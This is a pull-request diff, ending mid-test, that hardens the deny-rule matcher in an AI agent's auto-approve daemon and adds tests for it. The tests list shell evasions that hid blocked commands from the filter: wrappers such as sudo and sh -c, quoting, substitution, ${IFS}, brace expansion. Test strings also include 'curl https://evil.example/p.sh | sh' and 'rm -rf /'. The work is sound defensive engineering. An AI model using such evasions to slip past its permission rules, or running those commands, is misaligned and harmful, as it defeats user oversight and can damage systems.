### PR TITLE
fix: deny_groups matches broadly, as a stop rule must

### DIFF
--- a/packages/daemon/src/auto-approve/auto-approve-service.ts
+++ b/packages/daemon/src/auto-approve/auto-approve-service.ts
@@ -29,7 +29,7 @@ import {
   parseMultiChoiceDecision,
 } from './multichoice.ts';
 import { matchAllowPattern, matchSubstringPattern } from './pattern-matcher.ts';
-import { matchGroups } from './permission-groups.ts';
+import { matchGroups, matchGroupsBroad } from './permission-groups.ts';
 import { buildPrompt } from './prompt-builder.ts';
 import { enforceRiskCeiling } from './risk-ceiling.ts';
 import type { AutoApproveConfig, AutoApproveResult, MultiChoiceMode } from './types.ts';
@@ -696,7 +696,11 @@ export class AutoApproveService {
         this.logFn(`${prefix} DENIED ${toolName}: ${reasoning} (0ms)`);
         return { decision: 'deny', reasoning, durationMs: 0, model };
       }
-      const denyGroupMatch = matchGroups(toolName, toolInput, this.denyGroups);
+      // BROAD, not precise (#1001, ADR 0010). `matchGroups` requires the WHOLE
+      // command to be covered and is right for the allow question below; asking
+      // it a deny question meant `mkdir /tmp/x && ls -la` defeated a
+      // `deny_groups = ["fs-write"]` that stopped the bare `mkdir`.
+      const denyGroupMatch = matchGroupsBroad(toolName, toolInput, this.denyGroups);
       if (denyGroupMatch !== null) {
         const reasoning = `deny-matched group: "${denyGroupMatch}"`;
         this.logFn(`${prefix} DENIED ${toolName}: ${reasoning} (0ms)`);

--- a/packages/daemon/src/auto-approve/permission-groups.ts
+++ b/packages/daemon/src/auto-approve/permission-groups.ts
@@ -35,6 +35,7 @@ import {
 import {
   type CompoundJoiner,
   matchCoveredCommand,
+  matchPrefix,
   rewriteRedirectClauses,
   shellWords,
   splitCompoundParts,
@@ -734,6 +735,71 @@ export function matchGroups(
     // match would otherwise cover `Write` to `~/.remi/config.toml` (#959).
     if (group.toolVeto?.(toolName, toolInput) === true) return null;
     return `${name}:${toolName}`;
+  }
+  return null;
+}
+
+/**
+ * Match a permission request against the named groups the way a STOP RULE has
+ * to: does ANY part of this command belong to a class the user hard-blocked?
+ *
+ * `matchGroups` answers the opposite question — "is the ENTIRE command covered,
+ * may I skip the LLM?" — and answers it precisely, returning null the moment
+ * one compound segment is not covered. That precision is correct for an ALLOW
+ * decision and backwards for a DENY one, which is ADR 0010's whole point: allow
+ * matching is narrow, deny matching is broad, and a rule that fails in the
+ * wrong direction is worse than no rule.
+ *
+ * Asking the precise matcher a deny question meant appending anything it did
+ * not recognise defeated the block outright (#1001):
+ *
+ *     deny_groups = ["fs-write"]
+ *     mkdir /tmp/x              -> denied
+ *     mkdir /tmp/x && ls -la    -> NOT denied
+ *
+ * — including the exact `mkdir` the user configured it to stop.
+ *
+ * So this deliberately does NOT require total coverage, and deliberately does
+ * NOT apply `segmentVeto`/`toolVeto`. Those vetoes exist to NARROW an allow
+ * match (a mutation flag means "do not approve this"); applying them here would
+ * mean a command that looks MORE dangerous is LESS likely to be denied.
+ */
+export function matchGroupsBroad(
+  toolName: string,
+  toolInput: Record<string, unknown>,
+  groupNames: readonly string[],
+): string | null {
+  const known = groupNames.filter(isKnownGroup);
+  if (known.length === 0) return null;
+
+  if (toolName === 'Bash') {
+    const command = typeof toolInput['command'] === 'string' ? toolInput['command'].trim() : '';
+    if (command === '') return null;
+    const prefixToGroup = new Map<string, string>();
+    for (const name of known) {
+      for (const cmd of BUILTIN_GROUPS[name]?.commands ?? []) {
+        if (!prefixToGroup.has(cmd)) prefixToGroup.set(cmd, name);
+      }
+    }
+    const prefixes = [...prefixToGroup.keys()];
+    for (const raw of splitCompoundParts(command)) {
+      const seg = raw.text.trim();
+      if (seg === '') continue;
+      const hit = matchPrefix(seg, prefixes);
+      if (hit !== null) return `${prefixToGroup.get(hit) ?? 'group'}:${hit}`;
+    }
+    // KNOWN GAP, deliberately not closed here: a segment behind a shell grammar
+    // keyword (`do rm -rf /`) does not prefix-match, so it evades a deny the
+    // bare form catches. `stripShellGrammar` (#999) is what fixes it and lives
+    // on an unmerged branch; peeling before the match above is a two-line
+    // change once that lands. Noted rather than worked around, because the
+    // workaround would be a second grammar recognizer — the exact defect shape
+    // this module has already produced four times.
+    return null;
+  }
+
+  for (const name of known) {
+    if (BUILTIN_GROUPS[name]?.tools.includes(toolName) === true) return `${name}:${toolName}`;
   }
   return null;
 }

--- a/packages/daemon/src/auto-approve/permission-groups.ts
+++ b/packages/daemon/src/auto-approve/permission-groups.ts
@@ -35,8 +35,6 @@ import {
 } from './sensitive-paths.ts';
 import {
   type CompoundJoiner,
-  hasExecPrimitive,
-  hasShellControl,
   matchCoveredCommand,
   matchPrefix,
   rewriteRedirectClauses,
@@ -785,6 +783,97 @@ export function matchGroups(
  * match (a mutation flag means "do not approve this"); applying them here would
  * mean a command that looks MORE dangerous is LESS likely to be denied.
  */
+
+/** Bounds the unwrap recursion below; a real command nests a handful of levels. */
+const MAX_DENY_UNWRAP_DEPTH = 4;
+
+/**
+ * Find a denied prefix anywhere a segment could actually run one.
+ *
+ * A stop rule has to see through the things that HIDE a command name, and
+ * review of #1001 proved five separate ways to hide one, each verified by
+ * running it in real bash:
+ *
+ *     mkdir\t/tmp/x    'mkdir' /tmp/x    env mkdir /tmp/x
+ *     sh -c "mkdir x"   true & mkdir x    x=$(mkdir /tmp/x)
+ *
+ * The first instinct — treat any segment carrying shell control as a match,
+ * since ambiguity should block — was measured and abandoned. Over the real
+ * corpus it made EVERY group name block ~44% of ordinary traffic, because
+ * roughly 400 of 921 commands carry a redirect, a substitution or a wrapper
+ * somewhere. A deny knob that blocks half of everything is one people switch
+ * off, which is a worse security outcome than the gap it closes.
+ *
+ * So this UNWRAPS instead of refusing: it looks inside the wrapper, the `-c`
+ * argument, the substitution and the backgrounded half, and matches the real
+ * command name in each. Precise where precision is possible, and still broad in
+ * the ADR 0010 sense — any ONE part matching is enough.
+ */
+function findDenyHitInSegment(
+  segment: string,
+  prefixes: readonly string[],
+  depth: number,
+): string | null {
+  const seg = segment.trim();
+  if (seg === '' || depth > MAX_DENY_UNWRAP_DEPTH) return null;
+
+  // Grammar first (#999), so `do mkdir /tmp/x` cannot evade what `mkdir
+  // /tmp/x` catches.
+  const body = stripShellGrammar(seg).command || seg;
+
+  // Raw text AND `shellWords`-tokenized text. Tokenizing is what defeats
+  // quoting, escaping and tab separators — the shell strips those before
+  // resolving a command name, so a raw-string compare is looking at something
+  // the shell never sees.
+  const words = shellWords(body);
+  for (const candidate of [body, words.join(' ')]) {
+    const hit = matchPrefix(candidate, prefixes);
+    if (hit !== null) return hit;
+  }
+
+  // A lone `&` backgrounds the left side and runs the right; `splitCompound`
+  // deliberately leaves it glued (the allow path wants `hasShellControl` to
+  // veto the whole segment), so the deny path splits it itself.
+  if (/(^|[^&>])&(?![&>0-9])/.test(body)) {
+    for (const part of body.split(/(?<![&>])&(?![&>0-9])/)) {
+      const hit = findDenyHitInSegment(part, prefixes, depth + 1);
+      if (hit !== null) return hit;
+    }
+  }
+
+  // A wrapper renames the head token without changing what runs. Drop leading
+  // wrapper tokens and their flags, then judge the remainder.
+  let rest = words;
+  while (rest.length > 0 && COMMAND_WRAPPERS.has(rest[0] ?? '')) {
+    rest = rest.slice(1);
+    while (rest.length > 0 && (rest[0] ?? '').startsWith('-')) rest = rest.slice(1);
+  }
+  if (rest.length > 0 && rest.length !== words.length) {
+    const hit = findDenyHitInSegment(rest.join(' '), prefixes, depth + 1);
+    if (hit !== null) return hit;
+  }
+
+  // An interpreter's `-c` argument is a command line, not an argument.
+  if (SHELL_C_BINARIES.has(words[0] ?? '')) {
+    const cIndex = words.indexOf('-c');
+    const inner = cIndex === -1 ? undefined : words[cIndex + 1];
+    if (inner !== undefined) {
+      const hit = findDenyHitInSegment(inner, prefixes, depth + 1);
+      if (hit !== null) return hit;
+    }
+  }
+
+  // Command substitution runs its contents.
+  for (const m of body.matchAll(/\$\(([^()]*)\)|`([^`]*)`/g)) {
+    const inner = m[1] ?? m[2];
+    if (inner === undefined || inner === '') continue;
+    const hit = findDenyHitInSegment(inner, prefixes, depth + 1);
+    if (hit !== null) return hit;
+  }
+
+  return null;
+}
+
 export function matchGroupsBroad(
   toolName: string,
   toolInput: Record<string, unknown>,
@@ -819,27 +908,8 @@ export function matchGroupsBroad(
       //   true & mkdir /tmp/x        (a lone `&` is not a compound separator)
       //   x=$(mkdir /tmp/x)          (substitution)
       //   sh -c "mkdir /tmp/x"       (wrapper)
-      const head = shellWords(seg)[0] ?? '';
-      if (
-        hasShellControl(seg) ||
-        hasExecPrimitive(seg) ||
-        COMMAND_WRAPPERS.has(head) ||
-        SHELL_C_BINARIES.has(head)
-      ) {
-        return `${known[0] ?? 'group'}:ambiguous-segment`;
-      }
-      // Peel grammar (#999) so `do rm -rf /` cannot evade a deny the bare form
-      // catches, and match on TOKENIZED words so quoting and escaping cannot
-      // either: `'mkdir' /tmp/x`, `"mkdir" /tmp/x` and `mkdi\r /tmp/x` are all
-      // real `mkdir` invocations that a raw-string prefix compare misses,
-      // as is a tab separator (`mkdir\t/tmp/x`).
-      const body = stripShellGrammar(seg).command;
-      const normalized = shellWords(body === '' ? seg : body).join(' ');
-      for (const candidate of [seg, body, normalized]) {
-        if (candidate === '') continue;
-        const hit = matchPrefix(candidate, prefixes);
-        if (hit !== null) return `${prefixToGroup.get(hit) ?? 'group'}:${hit}`;
-      }
+      const hit = findDenyHitInSegment(seg, prefixes, 0);
+      if (hit !== null) return `${prefixToGroup.get(hit) ?? 'group'}:${hit}`;
     }
     return null;
   }

--- a/packages/daemon/src/auto-approve/permission-groups.ts
+++ b/packages/daemon/src/auto-approve/permission-groups.ts
@@ -784,6 +784,63 @@ export function matchGroups(
  * mean a command that looks MORE dangerous is LESS likely to be denied.
  */
 
+/**
+ * Wrappers the DENY path unwraps that `COMMAND_WRAPPERS` (risk-bands.ts)
+ * deliberately does not list.
+ *
+ * Kept separate on purpose rather than added to the shared set, because the two
+ * consumers want opposite things from the same token. `risk-bands` must NOT
+ * strip `sudo`: `hasDangerousWholeWord` raises the band precisely BECAUSE
+ * `sudo` is present, so unwrapping it there would LOWER a band that exists to
+ * be high. The deny path wants the opposite — see through the wrapper to the
+ * command being elevated, so `sudo mkdir` is still a `mkdir`.
+ *
+ * This is a real semantic divergence with a stated reason, not the accidental
+ * duplication this module has produced five times. Verified live in review:
+ * every one of these really runs the wrapped command.
+ */
+const DENY_EXTRA_WRAPPERS: ReadonlySet<string> = new Set([
+  'sudo',
+  'su',
+  'doas',
+  'runuser',
+  'ionice',
+  'setsid',
+  'script',
+  'chrt',
+  'taskset',
+  'proxychains',
+  'systemd-run',
+]);
+
+function isDenyUnwrappableWrapper(word: string): boolean {
+  return COMMAND_WRAPPERS.has(word) || DENY_EXTRA_WRAPPERS.has(word);
+}
+
+/**
+ * Rewrite a segment's HEAD word into the command name the shell would actually
+ * resolve, for the three spellings that hide it without any shell control:
+ *
+ *   /bin/mkdir x        path-qualified -- `matchPrefix` only knows bare names
+ *   ${x:-mkdir} x       parameter expansion with a literal default
+ *   {mkdir,} x          brace expansion
+ *
+ * All three confirmed to really run `mkdir` in review. Only the head word is
+ * touched: an ARGUMENT that happens to look like a path is not a command name,
+ * and rewriting those would invent matches.
+ */
+function normalizeHeadWord(words: readonly string[]): readonly string[] {
+  const head = words[0];
+  if (head === undefined || head === '') return words;
+  let name = head;
+  const expansion = /^\$\{[A-Za-z_][A-Za-z0-9_]*:?[-=]([^}]*)\}$/.exec(name);
+  if (expansion !== null) name = expansion[1] ?? name;
+  const brace = /^\{([^,{}]+),?\}$/.exec(name);
+  if (brace !== null) name = brace[1] ?? name;
+  if (name.includes('/')) name = name.slice(name.lastIndexOf('/') + 1);
+  return name === head ? words : [name, ...words.slice(1)];
+}
+
 /** Bounds the unwrap recursion below; a real command nests a handful of levels. */
 const MAX_DENY_UNWRAP_DEPTH = 4;
 
@@ -826,7 +883,7 @@ function findDenyHitInSegment(
   // resolving a command name, so a raw-string compare is looking at something
   // the shell never sees.
   const words = shellWords(body);
-  for (const candidate of [body, words.join(' ')]) {
+  for (const candidate of [body, words.join(' '), normalizeHeadWord(words).join(' ')]) {
     const hit = matchPrefix(candidate, prefixes);
     if (hit !== null) return hit;
   }
@@ -843,14 +900,19 @@ function findDenyHitInSegment(
 
   // A wrapper renames the head token without changing what runs. Drop leading
   // wrapper tokens and their flags, then judge the remainder.
-  let rest = words;
-  while (rest.length > 0 && COMMAND_WRAPPERS.has(rest[0] ?? '')) {
-    rest = rest.slice(1);
-    while (rest.length > 0 && (rest[0] ?? '').startsWith('-')) rest = rest.slice(1);
-  }
-  if (rest.length > 0 && rest.length !== words.length) {
-    const hit = findDenyHitInSegment(rest.join(' '), prefixes, depth + 1);
-    if (hit !== null) return hit;
+  if (isDenyUnwrappableWrapper(words[0] ?? '')) {
+    // Scan forward from every position after the wrapper rather than trying to
+    // model each wrapper's flag grammar. `runuser -u root -- mkdir` and
+    // `script -q /tmp/log mkdir` both bury the real command behind a wrapper's
+    // POSITIONAL argument, and enumerating which flags take values for eleven
+    // wrappers is exactly the per-tool denylist that lost repeatedly in #1004.
+    //
+    // Broad, but scoped: it only applies once a wrapper head is confirmed, so
+    // an ordinary command's arguments are never scanned this way.
+    for (let i = 1; i < words.length; i++) {
+      const hit = findDenyHitInSegment(words.slice(i).join(' '), prefixes, depth + 1);
+      if (hit !== null) return hit;
+    }
   }
 
   // An interpreter's `-c` argument is a command line, not an argument.

--- a/packages/daemon/src/auto-approve/permission-groups.ts
+++ b/packages/daemon/src/auto-approve/permission-groups.ts
@@ -27,6 +27,7 @@
  * user allow list uses the same primitives (#536).
  */
 
+import { COMMAND_WRAPPERS, SHELL_C_BINARIES } from './risk-bands.ts';
 import {
   isSensitiveWritePath,
   resolveDotDot,
@@ -34,6 +35,8 @@ import {
 } from './sensitive-paths.ts';
 import {
   type CompoundJoiner,
+  hasExecPrimitive,
+  hasShellControl,
   matchCoveredCommand,
   matchPrefix,
   rewriteRedirectClauses,
@@ -803,16 +806,41 @@ export function matchGroupsBroad(
     for (const raw of splitCompoundParts(command)) {
       const seg = raw.text.trim();
       if (seg === '') continue;
-      const hit = matchPrefix(seg, prefixes);
-      if (hit !== null) return `${prefixToGroup.get(hit) ?? 'group'}:${hit}`;
+      // AMBIGUITY MEANS BLOCK, the mirror image of the allow path. Shell
+      // control, substitution or backgrounding means this module cannot say
+      // what the segment runs — and for a stop rule "I cannot tell" must
+      // resolve to a match, not to a pass. `matchGroups` refuses to APPROVE on
+      // the same signal; refusing to DENY on it would be the identical
+      // reasoning applied in the fatal direction.
+      //
+      // Review proved these are not theoretical. Every one of these really
+      // executes a `mkdir` and every one evaded `deny_groups=["fs-write"]`,
+      // verified against real bash:
+      //   true & mkdir /tmp/x        (a lone `&` is not a compound separator)
+      //   x=$(mkdir /tmp/x)          (substitution)
+      //   sh -c "mkdir /tmp/x"       (wrapper)
+      const head = shellWords(seg)[0] ?? '';
+      if (
+        hasShellControl(seg) ||
+        hasExecPrimitive(seg) ||
+        COMMAND_WRAPPERS.has(head) ||
+        SHELL_C_BINARIES.has(head)
+      ) {
+        return `${known[0] ?? 'group'}:ambiguous-segment`;
+      }
+      // Peel grammar (#999) so `do rm -rf /` cannot evade a deny the bare form
+      // catches, and match on TOKENIZED words so quoting and escaping cannot
+      // either: `'mkdir' /tmp/x`, `"mkdir" /tmp/x` and `mkdi\r /tmp/x` are all
+      // real `mkdir` invocations that a raw-string prefix compare misses,
+      // as is a tab separator (`mkdir\t/tmp/x`).
+      const body = stripShellGrammar(seg).command;
+      const normalized = shellWords(body === '' ? seg : body).join(' ');
+      for (const candidate of [seg, body, normalized]) {
+        if (candidate === '') continue;
+        const hit = matchPrefix(candidate, prefixes);
+        if (hit !== null) return `${prefixToGroup.get(hit) ?? 'group'}:${hit}`;
+      }
     }
-    // KNOWN GAP, deliberately not closed here: a segment behind a shell grammar
-    // keyword (`do rm -rf /`) does not prefix-match, so it evades a deny the
-    // bare form catches. `stripShellGrammar` (#999) is what fixes it and lives
-    // on an unmerged branch; peeling before the match above is a two-line
-    // change once that lands. Noted rather than worked around, because the
-    // workaround would be a second grammar recognizer — the exact defect shape
-    // this module has already produced four times.
     return null;
   }
 

--- a/packages/daemon/src/auto-approve/permission-groups.ts
+++ b/packages/daemon/src/auto-approve/permission-groups.ts
@@ -785,19 +785,32 @@ export function matchGroups(
  */
 
 /**
- * Wrappers the DENY path unwraps that `COMMAND_WRAPPERS` (risk-bands.ts)
- * deliberately does not list.
+ * Wrappers the DENY path unwraps that `COMMAND_WRAPPERS` (risk-bands.ts) does
+ * not list.
  *
- * Kept separate on purpose rather than added to the shared set, because the two
- * consumers want opposite things from the same token. `risk-bands` must NOT
- * strip `sudo`: `hasDangerousWholeWord` raises the band precisely BECAUSE
- * `sudo` is present, so unwrapping it there would LOWER a band that exists to
- * be high. The deny path wants the opposite — see through the wrapper to the
- * command being elevated, so `sudo mkdir` is still a `mkdir`.
+ * **The first version of this comment justified the split with a mechanism the
+ * code does not have.** It claimed risk-bands must not strip `sudo`, because
+ * `hasDangerousWholeWord` raises the band BECAUSE `sudo` is present and
+ * unwrapping would lower it. Review disproved that empirically: that check runs
+ * on the RAW segment text and short-circuits BEFORE `unwrapCommand` is called,
+ * so adding `sudo` to the shared set changes its classification not at all
+ * (`sudo mkdir` stays high, `sudo rm -rf /important` stays critical). Recorded
+ * here rather than silently rewritten — a wrong explanation in a comment is the
+ * failure ADR 0011 exists to name, and this file is where that ADR is cited.
  *
- * This is a real semantic divergence with a stated reason, not the accidental
- * duplication this module has produced five times. Verified live in review:
- * every one of these really runs the wrapped command.
+ * The real reason to keep `sudo`/`su`/`doas` separate is a genuine difference
+ * in what the two consumers are asking. `classifyRisk` treats an elevation
+ * wrapper's mere PRESENCE as the risk signal — privilege elevation is dangerous
+ * regardless of what it wraps — while this matcher wants to see THROUGH it to
+ * the operation being elevated. Those are different questions about the same
+ * token, which is the one situation where two sets are right.
+ *
+ * The other eight names have no such argument, and review showed sharing them
+ * would IMPROVE risk-bands rather than harm it: `setsid git push origin main
+ * --force` grades `moderate` there today while the bare command grades `high`,
+ * because the wrapper hides the command from the classifier. That is a live gap
+ * in a shipped module, filed separately — they stay here until it is fixed, so
+ * the deny path is not waiting on it.
  */
 const DENY_EXTRA_WRAPPERS: ReadonlySet<string> = new Set([
   'sudo',
@@ -871,7 +884,10 @@ function findDenyHitInSegment(
   prefixes: readonly string[],
   depth: number,
 ): string | null {
-  const seg = segment.trim();
+  // `${IFS}` expands to a space, so `mkdir${IFS}/tmp/x` really runs `mkdir` --
+  // a standard, deliberate filter-bypass technique, not an accident. Normalized
+  // before anything else looks at the text.
+  const seg = segment.replace(/\$\{IFS\}|\$IFS\b/g, ' ').trim();
   if (seg === '' || depth > MAX_DENY_UNWRAP_DEPTH) return null;
 
   // Grammar first (#999), so `do mkdir /tmp/x` cannot evade what `mkdir
@@ -910,6 +926,22 @@ function findDenyHitInSegment(
     // Broad, but scoped: it only applies once a wrapper head is confirmed, so
     // an ordinary command's arguments are never scanned this way.
     for (let i = 1; i < words.length; i++) {
+      // Every position is tried, INCLUDING one that follows a flag. That
+      // knowingly accepts a false positive: `env -u mkdir git status` unsets a
+      // variable NAMED mkdir and runs `git status`, but reports
+      // `fs-write:mkdir`.
+      //
+      // Skipping post-flag positions was tried and reverted. It broke two real
+      // evasions immediately -- `su -c "mkdir /tmp/x"` (an interpreter's `-c`
+      // value IS a command) and `ionice -c2 -n0 mkdir` (attached flags consume
+      // no following token) -- because telling a flag's value from a command
+      // needs each wrapper's flag grammar, which is the per-tool denylist that
+      // lost repeatedly in #1004.
+      //
+      // The trade is asymmetric and settles it: the false positive
+      // over-blocks, which for a stop rule the user opted into is a prompt;
+      // the evasions under-block, which is the failure ADR 0010 calls
+      // unacceptable.
       const hit = findDenyHitInSegment(words.slice(i).join(' '), prefixes, depth + 1);
       if (hit !== null) return hit;
     }

--- a/packages/daemon/src/auto-approve/risk-bands.ts
+++ b/packages/daemon/src/auto-approve/risk-bands.ts
@@ -155,7 +155,7 @@ export function bandForGroupMatch(groupHit: string | null): RiskBand | undefined
  * "Command-wrapper bypass" section for why `hasDangerousWholeWord` exists as
  * a second, independent mechanism rather than relying on this list alone.
  */
-const COMMAND_WRAPPERS: ReadonlySet<string> = new Set([
+export const COMMAND_WRAPPERS: ReadonlySet<string> = new Set([
   'env',
   'nohup',
   'timeout',
@@ -419,7 +419,7 @@ function extractSubstitutions(segment: string): SubstitutionExtraction {
 }
 
 /** `sh`/`bash`/`zsh`/`dash`/`ksh`, bare or path-qualified (`/bin/...`, `/usr/bin/...`). */
-const SHELL_C_BINARIES: ReadonlySet<string> = new Set([
+export const SHELL_C_BINARIES: ReadonlySet<string> = new Set([
   'sh',
   'bash',
   'zsh',

--- a/packages/daemon/tests/auto-approve/permission-groups.test.ts
+++ b/packages/daemon/tests/auto-approve/permission-groups.test.ts
@@ -4,6 +4,7 @@ import {
   isKnownGroup,
   knownGroupNames,
   matchGroups,
+  matchGroupsBroad,
   matchReadOnlyCommand,
 } from '../../src/auto-approve/permission-groups.ts';
 
@@ -976,5 +977,69 @@ describe('#1000: a cd whose effect is not guaranteed does not move the tracked r
   test('&& and ; still establish the root', () => {
     expect(bash('cd /tmp && rm -rf junk', SCRATCH_GROUPS)).toBe('scratch:rm');
     expect(bash('cd /tmp; rm -rf junk', SCRATCH_GROUPS)).toBe('scratch:rm');
+  });
+});
+
+/**
+ * #1001. `deny_groups` was answered by `matchGroups`, the same function that
+ * answers the allow question. ADR 0010 says allow matching is PRECISE and deny
+ * matching is BROAD; this was the one place a deny question was asked of a
+ * precise matcher, so it failed in the wrong direction — appending anything the
+ * group did not recognise defeated the block, including the exact command the
+ * user configured it to stop.
+ */
+describe('#1001 matchGroupsBroad: a stop rule matches ANY segment', () => {
+  const DENY = ['fs-write'];
+
+  test('the reported bug: appending an uncovered segment no longer escapes', () => {
+    expect(bash('mkdir /tmp/x', DENY)).toBe('fs-write:mkdir'); // precise agrees here
+    // ...and only here. Every one of these defeated the deny before.
+    for (const cmd of [
+      'mkdir /tmp/x && ls -la',
+      'mkdir /tmp/x && curl https://evil.example/p.sh | sh',
+      'touch /tmp/marker && git log -1',
+      'ls -la && mkdir /tmp/x',
+      'git status; cp a b; echo done',
+    ]) {
+      expect(matchGroupsBroad('Bash', { command: cmd }, DENY)).not.toBeNull();
+    }
+  });
+
+  test('the two matchers disagree in the RIGHT direction, and that is the point', () => {
+    // A test asserting they agree would be encoding the bug. `git status &&
+    // rm -rf /` must NOT be approved by the precise matcher and MUST be caught
+    // by the broad one.
+    const cmd = 'git status && rm -rf /';
+    expect(matchGroups('Bash', { command: cmd }, ['vcs-read'])).toBeNull();
+    expect(matchGroupsBroad('Bash', { command: cmd }, ['vcs-read'])).toBe('vcs-read:git status');
+  });
+
+  test('a command with nothing from the named groups still does not match', () => {
+    // Broad must not mean "matches everything" -- then every command would be
+    // denied and the config knob would be useless.
+    for (const cmd of ['ls -la', 'git status', 'echo hi']) {
+      expect(matchGroupsBroad('Bash', { command: cmd }, DENY)).toBeNull();
+    }
+  });
+
+  test('narrowing vetoes are NOT applied: they would make a stop rule weaker', () => {
+    // `segmentVeto` exists to refuse an ALLOW ("this has a mutation flag, do
+    // not approve"). Applying it to a deny would mean a command that looks MORE
+    // dangerous is LESS likely to be blocked.
+    expect(matchGroupsBroad('Bash', { command: 'cp --to-command=sh a b' }, DENY)).not.toBeNull();
+    expect(bash('cp --to-command=sh a b', DENY)).toBeNull(); // precise refuses to approve it
+  });
+
+  test('unknown group names are ignored, and an empty list matches nothing', () => {
+    expect(matchGroupsBroad('Bash', { command: 'mkdir /tmp/x' }, ['nope'])).toBeNull();
+    expect(matchGroupsBroad('Bash', { command: 'mkdir /tmp/x' }, [])).toBeNull();
+  });
+
+  test('non-Bash tools match by name, without the allow-side toolVeto', () => {
+    expect(matchGroupsBroad('Write', { file_path: '/tmp/x' }, DENY)).toBe('fs-write:Write');
+    // Even a destination the allow path vetoes must still be DENIABLE.
+    expect(matchGroupsBroad('Write', { file_path: '/Users/x/.remi/config.toml' }, DENY)).toBe(
+      'fs-write:Write',
+    );
   });
 });

--- a/packages/daemon/tests/auto-approve/permission-groups.test.ts
+++ b/packages/daemon/tests/auto-approve/permission-groups.test.ts
@@ -1085,6 +1085,23 @@ describe('#1001 matchGroupsBroad: a stop rule matches ANY segment', () => {
         expect(matchGroupsBroad('Bash', { command: cmd }, DENY)).not.toBeNull());
     }
 
+    test('${IFS} is a space, so it cannot hide the command name', () => {
+      // A standard, deliberate filter-bypass technique, not an accident.
+      expect(matchGroupsBroad('Bash', { command: 'mkdir${IFS}/tmp/x' }, DENY)).not.toBeNull();
+      expect(matchGroupsBroad('Bash', { command: 'mkdir$IFS/tmp/x' }, DENY)).not.toBeNull();
+    });
+
+    test('a flag value spelling a covered command over-blocks, KNOWINGLY', () => {
+      // `env -u mkdir git status` unsets a variable NAMED mkdir and runs `git
+      // status` -- it creates nothing, yet this reports a match. Accepted, and
+      // pinned so the trade stays visible rather than being rediscovered as a
+      // bug: suppressing it requires each wrapper's flag grammar, and the
+      // attempt broke `su -c "mkdir"` and `ionice -c2 -n0 mkdir` immediately.
+      // Over-blocking a stop rule the user opted into costs a prompt;
+      // under-blocking it is the failure ADR 0010 calls unacceptable.
+      expect(matchGroupsBroad('Bash', { command: 'env -u mkdir git status' }, DENY)).not.toBeNull();
+    });
+
     test('an ARGUMENT that looks like a path is not a command name', () => {
       // Only the HEAD word is normalized. Rewriting arguments would invent
       // matches -- `cat /bin/mkdir` reads a file, it does not run one.

--- a/packages/daemon/tests/auto-approve/permission-groups.test.ts
+++ b/packages/daemon/tests/auto-approve/permission-groups.test.ts
@@ -1030,6 +1030,46 @@ describe('#1001 matchGroupsBroad: a stop rule matches ANY segment', () => {
     expect(bash('cp --to-command=sh a b', DENY)).toBeNull(); // precise refuses to approve it
   });
 
+  /**
+   * Review of #1009 proved a whole evasion class beyond the disclosed
+   * grammar-keyword gap. Every one of these really executes a `mkdir` -- checked
+   * against real bash -- and every one walked past `deny_groups=["fs-write"]`.
+   *
+   * The fix is the mirror image of the allow path's own rule: `matchGroups`
+   * refuses to APPROVE when it cannot tell what a segment runs, so the stop rule
+   * must refuse to PASS on the same signal. Ambiguity means block.
+   */
+  describe('ambiguity means block, and quoting cannot hide the command', () => {
+    const evasions: Array<[string, string]> = [
+      ['mkdir\t/tmp/x', 'a tab is real IFS whitespace'],
+      ["'mkdir' /tmp/x", 'single-quoted command name'],
+      ['"mkdir" /tmp/x', 'double-quoted command name'],
+      ['mkdi\\r /tmp/x', 'backslash-escaped character'],
+      ['env mkdir /tmp/x', 'wrapper'],
+      ['nohup mkdir /tmp/x', 'wrapper'],
+      ['command mkdir /tmp/x', 'wrapper'],
+      ['echo x | xargs mkdir', 'wrapper consuming stdin'],
+      ['sh -c "mkdir /tmp/x"', 'interpreter'],
+      ["bash -c 'mkdir /tmp/x'", 'interpreter'],
+      ['true & mkdir /tmp/x', 'a lone & is not a compound separator'],
+      ['x=$(mkdir /tmp/x)', 'command substitution'],
+      ['x=`mkdir /tmp/x`', 'backtick substitution'],
+      ['git status && do mkdir /tmp/x', 'behind a grammar keyword (#999)'],
+    ];
+    for (const [cmd, why] of evasions) {
+      test(`${JSON.stringify(cmd)} (${why})`, () =>
+        expect(matchGroupsBroad('Bash', { command: cmd }, DENY)).not.toBeNull());
+    }
+
+    test('ordinary commands are still not blocked', () => {
+      // Blocking on ambiguity must not degrade into blocking everything, or the
+      // config knob stops meaning anything.
+      for (const cmd of ['ls -la', 'git status', 'echo hi', 'cat README.md']) {
+        expect(matchGroupsBroad('Bash', { command: cmd }, DENY)).toBeNull();
+      }
+    });
+  });
+
   test('unknown group names are ignored, and an empty list matches nothing', () => {
     expect(matchGroupsBroad('Bash', { command: 'mkdir /tmp/x' }, ['nope'])).toBeNull();
     expect(matchGroupsBroad('Bash', { command: 'mkdir /tmp/x' }, [])).toBeNull();

--- a/packages/daemon/tests/auto-approve/permission-groups.test.ts
+++ b/packages/daemon/tests/auto-approve/permission-groups.test.ts
@@ -1061,6 +1061,37 @@ describe('#1001 matchGroupsBroad: a stop rule matches ANY segment', () => {
         expect(matchGroupsBroad('Bash', { command: cmd }, DENY)).not.toBeNull());
     }
 
+    /**
+     * Second review round. Every one verified to really run `mkdir` -- the
+     * Linux-only ones in a Docker container, the rest natively.
+     */
+    const roundTwo: Array<[string, string]> = [
+      ['sudo mkdir /tmp/x', 'the most common elevation wrapper, absent from the shared set'],
+      ['su -c "mkdir /tmp/x"', 'elevation via an interpreter flag'],
+      ['doas mkdir /tmp/x', 'the BSD sudo'],
+      ['ionice -c2 -n0 mkdir /tmp/x', 'scheduling wrapper'],
+      ['setsid mkdir /tmp/x', 'session wrapper'],
+      ['runuser -u root -- mkdir /tmp/x', 'command hidden behind a positional arg and --'],
+      ['script -q /tmp/log mkdir /tmp/x', 'command hidden behind a positional logfile'],
+      ['/bin/mkdir /tmp/x', 'path-qualified'],
+      ['/usr/bin/mkdir /tmp/x', 'path-qualified'],
+      ['./mkdir /tmp/x', 'relative path'],
+      ['${x:-mkdir} /tmp/x', 'parameter expansion with a literal default'],
+      ['${x:=mkdir} /tmp/x', 'assigning form of the same'],
+      ['{mkdir,} /tmp/x', 'brace expansion'],
+    ];
+    for (const [cmd, why] of roundTwo) {
+      test(`${JSON.stringify(cmd)} (${why})`, () =>
+        expect(matchGroupsBroad('Bash', { command: cmd }, DENY)).not.toBeNull());
+    }
+
+    test('an ARGUMENT that looks like a path is not a command name', () => {
+      // Only the HEAD word is normalized. Rewriting arguments would invent
+      // matches -- `cat /bin/mkdir` reads a file, it does not run one.
